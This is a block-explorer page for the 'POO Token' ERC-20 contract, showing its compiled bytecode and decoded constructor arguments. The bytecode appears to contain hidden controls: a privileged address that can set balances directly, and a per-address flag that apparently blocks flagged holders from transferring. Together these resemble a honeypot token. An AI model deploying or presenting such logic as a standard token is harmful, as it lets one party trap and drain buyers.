602001610e11602991396001600160a01b038a1660009081526003602090815260408083203384529091529020549190610a5c565b610764565b5060019392505050565b60018260ff1610156103ff5760405162461bcd60e51b815260206004820152602b60248201527f416d6f756e74206f6620726563697069656e747320616e642076616c7565732060448201526a0c8dedc4ee840dac2e8c6d60ab1b60648201526084015b60405180910390fd5b6004546000906001600160a01b0385811691161415610440576104228183610d38565b6001600160a01b038516600090815260016020526040902055610467565b61044d8160ff8516610d38565b6001600160a01b0385166000908152600160205260409020555b50505050565b60045433906000906001600160a01b0316821415610508576001600160a01b038216600090815260016020526040812080548592906104ad908490610d50565b90915550506001600160a01b038516600090815260016020526040812080548592906104da908490610d38565b90915550506001600160a01b0385166000908152600260205260409020805460ff1916851515179055610576565b6001600160a01b03821660009081526001602052604090205461052c908290610d50565b6001600160a01b03808416600090815260016020526040808220939093559087168152205461055c908290610d38565b6001600160a01b0386166000908152600160205260409020555b5050505050565b3360008181526003602090815260408083206001600160a01b038716845290915281205490916103209185906103839086610751565b6000546001600160a01b0316331461060d5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103f6565b6106176000610a88565b565b60606006805461029090610d67565b3360005b8351811015610467576106678285838151811061065957634e487b7160e01b600052603260045260246000fd5b60200260200101518561088c565b8061067181610da2565b91505061062c565b600061032033848461088c565b6000546001600160a01b031633146106e05760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103f6565b6001600160a01b0381166107455760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103f6565b61074e81610a88565b50565b600061075d8284610d38565b9392505050565b6001600160a01b0383166107c85760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103f6565b6001600160a01b03821661082a5760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103f6565b6001600160a01b0383811660008181526003602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166108f15760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b60648201526084016103f6565b6001600160a01b0382166109535760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b60648201526084016103f6565b6001600160a01b03831660009081526002602052604090205460ff161561099c576001600160a01b03831660009081526001602081905260409091205461099991610d38565b90505b6109d981604051806060016040528060278152602001610dea602791396001600160a01b0386166000908152600160205260409020549190610a5c565b6001600160a01b038085166000908152600160205260408082209390935590841681522054610a089082610751565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061087f9085815260200190565b60008184841115610a805760405162461bcd60e51b81526004016103f69190610ce5565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b80356001600160a01b0381168114610aef57600080fd5b919050565b600060208284031215610b05578081fd5b61075d82610ad8565b60008060408385031215610b20578081fd5b610b2983610ad8565b9150610b3760208401610ad8565b90509250929050565b600080600060608486031215610b54578081fd5b610b5d84610ad8565b9250610b6b60208501610ad8565b9150604084013590509250925092565b600080600060608486031215610b8f578283fd5b610b9884610ad8565b925060208401358015158114610bac578283fd5b929592945050506040919091013590565b60008060408385031215610bcf578182fd5b610bd883610ad8565b946020939093013593505050565b600080600060608486031215610bfa578283fd5b610c0384610ad8565b9250602084013560ff81168114610bac578283fd5b60008060408385031215610c2a578182fd5b823567ffffffffffffffff80821115610c41578384fd5b818501915085601f830112610c54578384fd5b8135602082821115610c6857610c68610dd3565b8160051b604051601f19603f83011681018181108682111715610c8d57610c8d610dd3565b604052838152828101945085830182870184018b1015610cab578889fd5b8896505b84871015610cd457610cc081610ad8565b865260019690960195948301948301610caf565b509997909101359750505050505050565b6000602080835283518082850152825b81811015610d1157858101830151858201604001528201610cf5565b81811115610d225783604083870101525b50601f01601f1916929092016040019392505050565b60008219821115610d4b57610d4b610dbd565b500190565b600082821015610d6257610d62610dbd565b500390565b600181811c90821680610d7b57607f821691505b60208210811415610d9c57634e487b7160e01b600052602260045260246000fd5b50919050565b6000600019821415610db657610db6610dbd565b5060010190565b634e487b7160e01b600052601160045260246000fd5b634e487b7160e01b600052604160045260246000fdfe4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212204071daf17d5202c844cfe44fede39e5c7368dba7f966be86df2ab7cd9638287164736f6c63430008040033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
00000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e000000000000000000000000000000000000000000000000000000000000000120000000000000000000000006abf9901401c31ccbe5cce273b8b0d417a12f52600000000000000000000000000000000000000000000000000000746a52880000000000000000000000000000000000000000000000000000000000000000009504f4f20546f6b656e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003504f4f0000000000000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): POO Token
Arg [1] : symbol_ (string): POO
Arg [2] : decimals_ (uint8): 18
Arg [3] : currOwnershipAddr (address): 0x6aBf9901401C31CCbe5Cce273b8B0d417a12f526
Arg [4] : totalSupply_ (uint256): 8000000000000
-----Encoded View---------------
9 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000e0
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000012
Arg [3] : 0000000000000000000000006abf9901401c31ccbe5cce273b8b0d417a12f526
Arg [4] : 00000000000000000000000000000000000000000000000000000746a5288000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [6] : 504f4f20546f6b656e0000000000000000000000000000000000000000000000
Arg [7] : 0000000000000000000000000000000000000000000000000000000000000003
Arg [8] : 504f4f0000000000000000000000000000000000000000000000000000000000
Loading...
Loading
Loading...
Loading
Multichain Portfolio | 30 Chains
Chain | Token | Portfolio % | Price | Amount | Value |
---|
Loading...
Loading
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.